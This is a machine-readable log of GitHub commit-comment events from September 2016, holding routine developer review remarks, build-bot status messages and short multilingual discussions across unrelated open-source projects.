{"id":"4632820310","type":"CommitCommentEvent","actor":{"login":"adbatista"},"repo":{"name":"Codeminer42/cm42-central"},"payload":{"comment":{"id":19213086,"position":4,"line":18,"path":"app/models/project.rb","commit_id":"bb7b38ea8420f4bd2ae2d741f14cb015f30233a5","created_at":"2016-09-28T19:21:50Z","updated_at":"2016-09-28T19:21:50Z","body":":+1: "}},"created_at":"2016-09-28T19:21:50Z"}
{"id":"4632822915","type":"CommitCommentEvent","actor":{"login":"DckToken"},"repo":{"name":"DckToken/ero-bot"},"payload":{"comment":{"id":19213091,"position":13,"line":268,"path":"run.py","commit_id":"eb89757ab3e2d9e3eeae0da400fa2453786eaa1a","created_at":"2016-09-28T19:22:21Z","updated_at":"2016-09-28T19:22:21Z","body":"This should be `async def echo(*, string: str):` if I want to repeat the full message. Quoting solves this too"}},"created_at":"2016-09-28T19:22:21Z"}
{"id":"4632827273","type":"CommitCommentEvent","actor":{"login":"gparmer"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213099,"position":87,"line":87,"path":"src/platform/i386/lapic.c","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:23:12Z","updated_at":"2016-09-28T19:23:12Z","body":"same line or {}"}},"created_at":"2016-09-28T19:23:12Z"}
{"id":"4632830284","type":"CommitCommentEvent","actor":{"login":"gparmer"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213108,"position":5,"line":208,"path":"src/kernel/include/tcap.h","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:23:46Z","updated_at":"2016-09-28T19:23:46Z","body":"++  great integration using the existing abstractions"}},"created_at":"2016-09-28T19:23:46Z"}
{"id":"4632833148","type":"CommitCommentEvent","actor":{"login":"gparmer"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213113,"position":19,"line":113,"path":"src/platform/i386/chal_cpu.h","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:24:19Z","updated_at":"2016-09-28T19:24:19Z","body":"This isn't quite a \"hardware agnostic\" approach to this...  but it will do for now!"}},"created_at":"2016-09-28T19:24:19Z"}
{"id":"4632834463","type":"CommitCommentEvent","actor":{"login":"calh"},"repo":{"name":"etsy/411"},"payload":{"comment":{"id":19213117,"position":null,"line":null,"path":null,"commit_id":"e8f2f35b7daf449c285a9b1ff2e3477aa6aed447","created_at":"2016-09-28T19:24:34Z","updated_at":"2016-09-28T19:24:34Z","body":":+1: "}},"created_at":"2016-09-28T19:24:34Z"}
{"id":"4632840663","type":"CommitCommentEvent","actor":{"login":"groll75"},"repo":{"name":"paysafegroup/neteller_rest_api_v1"},"payload":{"comment":{"id":19213129,"position":null,"line":null,"path":null,"commit_id":"5e1d54dfe93cc55135b5c636c2886d0dca3e812d","created_at":"2016-09-28T19:25:42Z","updated_at":"2016-09-28T19:25:42Z","body":"Accepting changes."}},"created_at":"2016-09-28T19:25:42Z"}
{"id":"4632840869","type":"CommitCommentEvent","actor":{"login":"jackregnart"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19213131,"position":null,"line":null,"path":null,"commit_id":"b9803eb978ea1a8bdfbe41c11fd481fb5d89b933","created_at":"2016-09-28T19:25:44Z","updated_at":"2016-09-28T19:25:44Z","body":"Just a bit of a test. Pushed it in case you guys were curious.\r\n\r\nIt's definitely possible to incrementally update the API and replace it with Grape. This example just duplicates what the api `ActivationsController` does. Authentication and stuff is ignored here."}},"created_at":"2016-09-28T19:25:44Z"}
{"id":"4632842811","type":"CommitCommentEvent","actor":{"login":"gparmer"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213134,"position":4,"line":53,"path":"src/platform/i386/kernel.h","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:26:05Z","updated_at":"2016-09-28T19:26:05Z","body":"not really sure these should be globally visible....shouldn't they be local to a more confined namespace?"}},"created_at":"2016-09-28T19:26:05Z"}
{"id":"4632845433","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19213139,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T19:26:33Z","updated_at":"2016-09-28T19:26:33Z","body":"ja ist Linux.\r\n\r\nhabe es jetzt überall geändert....\r\n\r\nFailed to load resource: the server responded with a status of 500 () (Google Chrome Untersuchen Modus nach klick auf speichern)"}},"created_at":"2016-09-28T19:26:33Z"}
{"id":"4632846930","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19213141,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:26:50Z","updated_at":"2016-09-28T19:26:50Z","body":"In order the things I skipped are:\r\nMusic ratings\r\nAnything PVR related\r\nAddonBrowser\r\nDialogMusicInfo is only partially done\r\nDialogGameControllers\r\nGlobalSearch\r\nDialogAudioDSPManager\r\nWhat's new and screenshots in DialogAddonInfo\r\nassets in addon.xml\r\nDialogPlayerProcessInfo\r\n\r\nThere is some more but it is all the stuff from the last 1 or 2 pages...\r\n"}},"created_at":"2016-09-28T19:26:50Z"}
{"id":"4632847961","type":"CommitCommentEvent","actor":{"login":"grempe"},"repo":{"name":"cryptosphere/sysrandom"},"payload":{"comment":{"id":19213142,"position":null,"line":null,"path":null,"commit_id":"c9bf3db3dee7cbe7289f8b27055a17bf6c9dd485","created_at":"2016-09-28T19:27:03Z","updated_at":"2016-09-28T19:27:03Z","body":"Thanks for the new release Tony."}},"created_at":"2016-09-28T19:27:03Z"}
{"id":"4632849552","type":"CommitCommentEvent","actor":{"login":"jmflorezff"},"repo":{"name":"FEMR/femr"},"payload":{"comment":{"id":19213145,"position":null,"line":null,"path":null,"commit_id":"c87717cc81313bca07bd598c52ea99936f0753ab","created_at":"2016-09-28T19:27:22Z","updated_at":"2016-09-28T19:27:22Z","body":"[FEMR-158] Don't require the user editing a user to fill out the \"Change User Password\" input fields"}},"created_at":"2016-09-28T19:27:22Z"}
{"id":"4632853260","type":"CommitCommentEvent","actor":{"login":"CoDanny"},"repo":{"name":"becvert/cordova-plugin-zeroconf"},"payload":{"comment":{"id":19213154,"position":null,"line":null,"path":null,"commit_id":"52136071a77cfaec4430bfa531a9d78a362340d3","created_at":"2016-09-28T19:28:04Z","updated_at":"2016-09-28T19:28:04Z","body":"Ok. odd I was expecting it to see it in github releases also. Also why do I still get:\r\n\r\nCheck dependencies\r\n\r\n“Use Legacy Swift Language Version” (SWIFT_VERSION) is required to be configured correctly for targets which use Swift. Use the [Edit > Convert > To Current Swift Syntax…] menu to choose a Swift version or use the Build Settings editor to configure the build setting directly.\r\n\r\nwhen I do an ios build"}},"created_at":"2016-09-28T19:28:04Z"}
{"id":"4632853793","type":"CommitCommentEvent","actor":{"login":"gparmer"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213156,"position":104,"line":104,"path":"src/platform/i386/lapic.c","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:28:10Z","updated_at":"2016-09-28T19:28:10Z","body":"add an issue to support the oneshot mode when you pull this"}},"created_at":"2016-09-28T19:28:10Z"}
{"id":"4632857338","type":"CommitCommentEvent","actor":{"login":"gparmer"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213167,"position":112,"line":112,"path":"src/platform/i386/lapic.c","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:28:51Z","updated_at":"2016-09-28T19:28:51Z","body":"please don't use -- in a larger expression except in `for` loops.  This is wildly confusing (too clever)"}},"created_at":"2016-09-28T19:28:51Z"}
{"id":"4632862601","type":"CommitCommentEvent","actor":{"login":"gparmer"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213177,"position":6,"line":96,"path":"src/platform/i386/vm.c","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:29:51Z","updated_at":"2016-09-28T19:29:51Z","body":"add an issue to move all hardware specific mapping out of generic vm code.  Leave it for now."}},"created_at":"2016-09-28T19:29:51Z"}
{"id":"4632863468","type":"CommitCommentEvent","actor":{"login":"gparmer"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213181,"position":null,"line":null,"path":null,"commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:30:01Z","updated_at":"2016-09-28T19:30:01Z","body":"Small changes.  ready for push."}},"created_at":"2016-09-28T19:30:01Z"}
{"id":"4632863687","type":"CommitCommentEvent","actor":{"login":"Amarender2"},"repo":{"name":"Amarender2/RESTWebServices"},"payload":{"comment":{"id":19213183,"position":null,"line":null,"path":null,"commit_id":"7450a205418a0a9b01df88eae8da8cedcf5685d6","created_at":"2016-09-28T19:30:03Z","updated_at":"2016-09-28T19:30:03Z","body":"http://localhost:8080/messenger/webapi/messages?year=2015&start=1&size=1"}},"created_at":"2016-09-28T19:30:03Z"}
{"id":"4632867014","type":"CommitCommentEvent","actor":{"login":"MadMikeDoc"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19213195,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:30:40Z","updated_at":"2016-09-28T19:30:40Z","body":"Thanks Mike, lots to do still."}},"created_at":"2016-09-28T19:30:40Z"}
{"id":"4632873389","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19213202,"position":16,"line":16,"path":"Assets/Scripts/ThreeDUMLAPI/ClassAttribute.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-28T19:31:52Z","updated_at":"2016-09-28T19:31:52Z","body":"@williamlac ClassAttribute.cs? Por que? Attribute.cs não seria a mesma coisa?"}},"created_at":"2016-09-28T19:31:52Z"}
{"id":"4632876522","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19213207,"position":2,"line":2,"path":"Assets/Scripts/ThreeDUMLAPI/ClassAttribute.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-28T19:32:26Z","updated_at":"2016-09-28T19:32:26Z","body":"@williamlac Class.cs? Tem certeza que o nome é este? E fui eu que criei?"}},"created_at":"2016-09-28T19:32:26Z"}
{"id":"4632876835","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19213210,"position":null,"line":null,"path":null,"commit_id":"1d92e338c264c5af0734a4dc4c121be9a086ef2a","created_at":"2016-09-28T19:32:29Z","updated_at":"2016-09-28T19:32:29Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2305 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.31%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T19:32:29Z"}
{"id":"4632878397","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19213217,"position":null,"line":null,"path":null,"commit_id":"08920df29f909dde0c4f65c63d80ae0b5540025f","created_at":"2016-09-28T19:32:47Z","updated_at":"2016-09-28T19:32:47Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 281](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1259&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T19:32:47Z"}
{"id":"4632881770","type":"CommitCommentEvent","actor":{"login":"zachsully"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19213225,"position":null,"line":null,"path":null,"commit_id":"33c8ef733afe39a26437587d5a775b4d93a8f5c7","created_at":"2016-09-28T19:33:25Z","updated_at":"2016-09-28T19:33:25Z","body":"1. I had a whole directory filled with smart constructors because the language-c ast was filled with extra arguments for source locations because the library was built for parsing (I think). The extra arguments produced a lot of unnecessary noise in the code.\r\n\r\n2. there was no support for the C preprocessor so things like #include were tacked on with strings in the end, and I also wanted to use the preprocessor to add openmp pragmas (though less portable)\r\n\r\n3. the language-c ast had several GCC only extensions weaved into it that I had on a couple of occasions used, producing code that wasn't portable to other C compilers. (openmp pragmas aren't exaclty pedantic either, but they are more widely supported than GCC extensions)\r\n\r\nThe two libraries on hackage that can generate C code are \"language-c\" and \"langauge-c-quote\". \"language-c-quote\" has a lot of extensions for OpenCL and CUDA. \"langauge-c\" appears more as a C parsing and analysis library. The one created here is designed specifically for code generation and is the only one that I see that has the support for the C preprocessor (though generating macros might not be a good idea)."}},"created_at":"2016-09-28T19:33:25Z"}
{"id":"4632885260","type":"CommitCommentEvent","actor":{"login":"theocbuu"},"repo":{"name":"theocbuu/my_site"},"payload":{"comment":{"id":19213230,"position":8,"line":8,"path":"app.js","commit_id":"60423a365bd1f582a74df9e825c7a3fbe7d0c720","created_at":"2016-09-28T19:34:04Z","updated_at":"2016-09-28T19:34:04Z","body":"join 'views' directory to the path"}},"created_at":"2016-09-28T19:34:04Z"}
{"id":"4632888193","type":"CommitCommentEvent","actor":{"login":"williamlac"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19213233,"position":2,"line":2,"path":"Assets/Scripts/ThreeDUMLAPI/ClassAttribute.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-28T19:34:35Z","updated_at":"2016-09-28T19:34:35Z","body":"Aa, eu esqueci de trocar esses nomes, perdão, eu peguei um exemplo seu e copiei e colei e alterei os nomes, ja consertei aqui"}},"created_at":"2016-09-28T19:34:35Z"}
{"id":"4632890913","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19213239,"position":null,"line":null,"path":null,"commit_id":"a36cf996c859f273b13f9f8a49bddbc13b463c40","created_at":"2016-09-28T19:35:07Z","updated_at":"2016-09-28T19:35:07Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a36cf996c859f273b13f9f8a49bddbc13b463c40-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a36cf996c859f273b13f9f8a49bddbc13b463c40-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T19:35:07Z"}
{"id":"4632892031","type":"CommitCommentEvent","actor":{"login":"williamlac"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19213246,"position":16,"line":16,"path":"Assets/Scripts/ThreeDUMLAPI/ClassAttribute.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-28T19:35:18Z","updated_at":"2016-09-28T19:35:18Z","body":"Então, eu tentei com ela, porém Attribute.cs não puxa de IXmlNode, e quando eu fiz puxar, deu conflito com a implementação de algumas coisas que você fez, então preferi criar uma nova"}},"created_at":"2016-09-28T19:35:18Z"}
{"id":"4632897843","type":"CommitCommentEvent","actor":{"login":"jamesokbo"},"repo":{"name":"jamesokbo/GroveMonitor"},"payload":{"comment":{"id":19213263,"position":4,"line":65,"path":"mainRPi/server.js","commit_id":"3467d485e56b7e535fcde4d49d01b05c766e1b3c","created_at":"2016-09-28T19:36:23Z","updated_at":"2016-09-28T19:36:23Z","body":"Added temporary error handling"}},"created_at":"2016-09-28T19:36:23Z"}
{"id":"4632900441","type":"CommitCommentEvent","actor":{"login":"zachsully"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19213267,"position":null,"line":null,"path":null,"commit_id":"33c8ef733afe39a26437587d5a775b4d93a8f5c7","created_at":"2016-09-28T19:36:50Z","updated_at":"2016-09-28T19:36:50Z","body":"Oh, and I can also insert comments into the generated code. I don't do it now, but I thought that might be useful"}},"created_at":"2016-09-28T19:36:50Z"}
{"id":"4632906239","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19213280,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:37:47Z","updated_at":"2016-09-28T19:37:47Z","body":"Not too much. Most of the changes are a new button here a new label there. The only ones that are not gonna be fun is DialogGameControllers and DialogAudioDSPManager, at least for me cause I don't use them... ever.\r\n\r\nDialogPlayerProcessInfo should be fun cause you get to design a whole new codec window which could be fun :smiley:\r\n\r\nI only stopped working on it cause schimi said to wait and then he passed so I wasn't sure what you wanted to do... \r\n\r\nAnyway, if you want me to start working on things again or do something in particular let me know."}},"created_at":"2016-09-28T19:37:47Z"}
{"id":"4632908068","type":"CommitCommentEvent","actor":{"login":"kraigmckernan"},"repo":{"name":"vim-airline/vim-airline-themes"},"payload":{"comment":{"id":19213288,"position":null,"line":null,"path":null,"commit_id":"f20e424702e179bbb71e5b61f37b144fd2c27061","created_at":"2016-09-28T19:38:10Z","updated_at":"2016-09-28T19:38:10Z","body":"I think `let g:AirlineTheme='<theme>'` is wrong. I was only able to get it to work with `let g:airline_theme='<theme>'`"}},"created_at":"2016-09-28T19:38:10Z"}
{"id":"4632914115","type":"CommitCommentEvent","actor":{"login":"nonmanifold"},"repo":{"name":"nonmanifold/svg-inline-loader"},"payload":{"comment":{"id":19213299,"position":null,"line":null,"path":null,"commit_id":"2ffa1c01cdc286015f219e881c70b557ea7f85c7","created_at":"2016-09-28T19:39:21Z","updated_at":"2016-09-28T19:39:21Z","body":"@stcherenkov pls, take a look"}},"created_at":"2016-09-28T19:39:21Z"}
{"id":"4632916327","type":"CommitCommentEvent","actor":{"login":"oztune"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":19213307,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-28T19:39:48Z","updated_at":"2016-09-28T19:39:48Z","body":"@mbostock How does this look? #287"}},"created_at":"2016-09-28T19:39:48Z"}
{"id":"4632918192","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19213311,"position":null,"line":null,"path":null,"commit_id":"33c8ef733afe39a26437587d5a775b4d93a8f5c7","created_at":"2016-09-28T19:40:11Z","updated_at":"2016-09-28T19:40:11Z","body":"All fine reasons; thanks :)"}},"created_at":"2016-09-28T19:40:11Z"}
{"id":"4632919296","type":"CommitCommentEvent","actor":{"login":"fatkidonabike"},"repo":{"name":"fatkidonabike/hello-world"},"payload":{"comment":{"id":19213313,"position":null,"line":null,"path":null,"commit_id":"1d13ce1c378377d3381ce75eb72e76ba85f588de","created_at":"2016-09-28T19:40:23Z","updated_at":"2016-09-28T19:40:23Z","body":"feelin fine"}},"created_at":"2016-09-28T19:40:23Z"}
{"id":"4632919972","type":"CommitCommentEvent","actor":{"login":"Odinthewanderer"},"repo":{"name":"Odinthewanderer/plexupdate"},"payload":{"comment":{"id":19213315,"position":null,"line":null,"path":null,"commit_id":"653588d43cff70c7be483c0149cc413945610993","created_at":"2016-09-28T19:40:31Z","updated_at":"2016-09-28T19:40:31Z","body":"."}},"created_at":"2016-09-28T19:40:31Z"}
{"id":"4632922811","type":"CommitCommentEvent","actor":{"login":"carrilloandre"},"repo":{"name":"carrilloandre/hello-world"},"payload":{"comment":{"id":19213323,"position":null,"line":null,"path":null,"commit_id":"eeee1933570c5f6fe490d6499ec7eaf10716b4b1","created_at":"2016-09-28T19:41:04Z","updated_at":"2016-09-28T19:41:04Z","body":"There was a mistake when committing this file. I accidentally uploaded an older version."}},"created_at":"2016-09-28T19:41:04Z"}
{"id":"4632928822","type":"CommitCommentEvent","actor":{"login":"MadMikeDoc"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19213336,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:42:12Z","updated_at":"2016-09-28T19:42:12Z","body":"Yeah, Schimi said to wait until textures were sorted and we are there now, I  noticed the refresh icon in dialogmusic isn't right but as you've said that is partially done. Yeah those 2 will be fun as i've never heard of them, lol."}},"created_at":"2016-09-28T19:42:12Z"}
{"id":"4632932252","type":"CommitCommentEvent","actor":{"login":"LorDClockaN"},"repo":{"name":"sam3000/android_device_huawei_angler"},"payload":{"comment":{"id":19213349,"position":null,"line":null,"path":null,"commit_id":"bdd8a5c444b24d135f1f47a7f8ca0427eeca24ee","created_at":"2016-09-28T19:42:50Z","updated_at":"2016-09-28T19:42:50Z","body":"To have NFC working, external/libnfc-nci needs to be tracked from AOSP\r\n\r\nalso do you have waky BT?"}},"created_at":"2016-09-28T19:42:50Z"}
{"id":"4632932689","type":"CommitCommentEvent","actor":{"login":"fg2it"},"repo":{"name":"ThomDietrich/openhabian"},"payload":{"comment":{"id":19213353,"position":93,"line":527,"path":"openhabian-setup.sh","commit_id":"497f6bd14ecc961983a2c4fea05e1d22dd50ffd7","created_at":"2016-09-28T19:42:55Z","updated_at":"2016-09-28T19:42:55Z","body":"you will run into trouble here. Current master of Grafana (and I guess v4) dropped `godep` and updated go to 1.7. So this won't work. You probably have to checkout specific branch. I would stick to v3.1.1 for now.\r\nOn Pi 1, careful with the `phantomjs` prerequisite : if the binary is not working on pi 1, `npm install` and `go run build.go package` will fail.\r\nFinally, since v3, grafana requires a c++11 compliant g++. This is fine on jessie, but not on wheezy where some additional steps are needed. "}},"created_at":"2016-09-28T19:42:55Z"}
{"id":"4632933137","type":"CommitCommentEvent","actor":{"login":"karesti"},"repo":{"name":"igoraresti/Messenger"},"payload":{"comment":{"id":19213355,"position":21,"line":21,"path":"src/test/java/org/iaresti/messenger/database/DatabaseTest.java","commit_id":"a713dbb9c564bb4174cac139ae2ce4a7ec55727c","created_at":"2016-09-28T19:43:00Z","updated_at":"2016-09-28T19:43:00Z","body":"no hace falta poner \"test\" al final porque ya se sabe con la @Test que es un test\r\n\r\nlo mismo con poner \"database\"\r\n\r\nUna buena forma de llamar al test es sobre lo que deberia de hacer. Pour ejemplo\r\nshould_be_able_to_get_message_by_year\r\n\r\nlo de poner \"_\" entre las palabras facilita la lectura de la frase y poder poner nombres mas largos. Cuando un test falla asi ves mas facil en la linea de commandos o en eclipse o intellij funcionanlemente el test que ha fallado.\r\nAdemas, cuando tienes mucho codigo y buscas por ejemplo en que parte del codigo se usa un metodo, el hecho de ver visualemente \"_\" en los nombres de los metodos referenciados te hace ver directamente que una parte del impcto esta \"solamente\" en los tests. \r\n\r\n"}},"created_at":"2016-09-28T19:43:00Z"}
{"id":"4632933233","type":"CommitCommentEvent","actor":{"login":"fg2it"},"repo":{"name":"ThomDietrich/openhabian"},"payload":{"comment":{"id":19213356,"position":89,"line":523,"path":"openhabian-setup.sh","commit_id":"497f6bd14ecc961983a2c4fea05e1d22dd50ffd7","created_at":"2016-09-28T19:43:01Z","updated_at":"2016-09-28T19:43:01Z","body":"- why not keep to /tmp ?\r\n- Did you tried my binary on a pi 1 ? I am unsure of the result."}},"created_at":"2016-09-28T19:43:01Z"}
{"id":"4632935045","type":"CommitCommentEvent","actor":{"login":"RomainJeff"},"repo":{"name":"christophehurpeau/pob-commit"},"payload":{"comment":{"id":19213360,"position":39,"line":39,"path":"prepare-commit-msg.js","commit_id":"da045177da9421ece64f5d07822766fc5b0022ef","created_at":"2016-09-28T19:43:22Z","updated_at":"2016-09-28T19:43:22Z","body":"Du coup ici on balance un `throw` a la place du `return` pour reject la promise ? "}},"created_at":"2016-09-28T19:43:22Z"}
{"id":"4632935554","type":"CommitCommentEvent","actor":{"login":"JorgeMartinezG"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":19213363,"position":null,"line":null,"path":null,"commit_id":"14e9887736c0101eaa99b1bbae627c9ff9cecae7","created_at":"2016-09-28T19:43:28Z","updated_at":"2016-09-28T19:43:28Z","body":"This commit installs a new version of Mapproxy including map and image servers fixes. Visualization of layers are shown below:\r\n\r\n![vzvblcyhgv](https://cloud.githubusercontent.com/assets/3285923/18929320/a7364220-8589-11e6-9ed4-a725aab07bfc.gif)\r\n\r\n@capooti @blewis "}},"created_at":"2016-09-28T19:43:28Z"}
{"id":"4632935738","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeVanilla"},"payload":{"comment":{"id":19213364,"position":null,"line":null,"path":null,"commit_id":"5fc6e1b84a0384a7b88ebe97df79d9906cb11323","created_at":"2016-09-28T19:43:30Z","updated_at":"2016-09-28T19:43:30Z","body":"@Minecrell \r\n\r\nWhy do you still do the second injector? Redirecting the first should be enough."}},"created_at":"2016-09-28T19:43:30Z"}
{"id":"4632937333","type":"CommitCommentEvent","actor":{"login":"lyan6"},"repo":{"name":"genenetwork/QTLReaper"},"payload":{"comment":{"id":19213366,"position":null,"line":null,"path":null,"commit_id":"34d39d4b7b906788810349780f9405404d29a965","created_at":"2016-09-28T19:43:49Z","updated_at":"2016-09-28T19:43:49Z","body":"Added License in the README file."}},"created_at":"2016-09-28T19:43:49Z"}
{"id":"4632937618","type":"CommitCommentEvent","actor":{"login":"binkybear"},"repo":{"name":"offensive-security/kali-nethunter"},"payload":{"comment":{"id":19213369,"position":null,"line":null,"path":null,"commit_id":"f64881e370a16f4004f73718a0d0462325736e44","created_at":"2016-09-28T19:43:51Z","updated_at":"2016-09-28T19:43:51Z","body":"I think maybe moving to building this in a docker container might be useful."}},"created_at":"2016-09-28T19:43:51Z"}
{"id":"4632938501","type":"CommitCommentEvent","actor":{"login":"karesti"},"repo":{"name":"igoraresti/Messenger"},"payload":{"comment":{"id":19213375,"position":17,"line":17,"path":"src/test/java/org/iaresti/messenger/database/DatabaseTest.java","commit_id":"a713dbb9c564bb4174cac139ae2ce4a7ec55727c","created_at":"2016-09-28T19:44:02Z","updated_at":"2016-09-28T19:44:02Z","body":"puedes añadir Assert como import statico. asi solo tienes que llamar a assertEquals etc ... y aligera la escritura y lectura"}},"created_at":"2016-09-28T19:44:02Z"}
{"id":"4632940037","type":"CommitCommentEvent","actor":{"login":"lyan6"},"repo":{"name":"genenetwork/QTLReaper"},"payload":{"comment":{"id":19213378,"position":null,"line":null,"path":null,"commit_id":"0a60f917ed2053683af467b654acc4b977f793e5","created_at":"2016-09-28T19:44:20Z","updated_at":"2016-09-28T19:44:20Z","body":"Added Authors in the README file."}},"created_at":"2016-09-28T19:44:20Z"}
{"id":"4632940311","type":"CommitCommentEvent","actor":{"login":"phanikishoreg"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213379,"position":19,"line":113,"path":"src/platform/i386/chal_cpu.h","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:44:23Z","updated_at":"2016-09-28T19:44:23Z","body":"Got it. Just wanted consistency checks to check support for TSC-Deadline mode. "}},"created_at":"2016-09-28T19:44:23Z"}
{"id":"4632944991","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19213395,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T19:45:16Z","updated_at":"2016-09-28T19:45:16Z","body":"Er kann irgendeine Datei nicht finden. Du solltest erstmal zurücksetzen und\ndann auf einer subdomain testen.\n\nIst immer schwer die Ursache zu finden ohne das System zu kennen. Ich\nselbst werde das die tage mal auf einem Linuxsystem testen. Heute schaffe\nich es nicht mehr.\n\nAm 28.09.2016 21:26 schrieb \"bornhaeusser\" <notifications@github.com>:\n\n> ja ist Linux.\n>\n> habe es jetzt überall geändert....\n>\n> Failed to load resource: the server responded with a status of 500 ()\n> (Google Chrome Untersuchen Modus nach klick auf speichern)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarkusHiller/OpenSoccer/commit/dd1e57a7b7bfb61d1354b33735135b2fe9f3d807#commitcomment-19213139>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALhUZNfeIBZwjNJlnjJzkswuo6tyHFq2ks5qur9pgaJpZM4KJHNS>\n> .\n>\n"}},"created_at":"2016-09-28T19:45:16Z"}
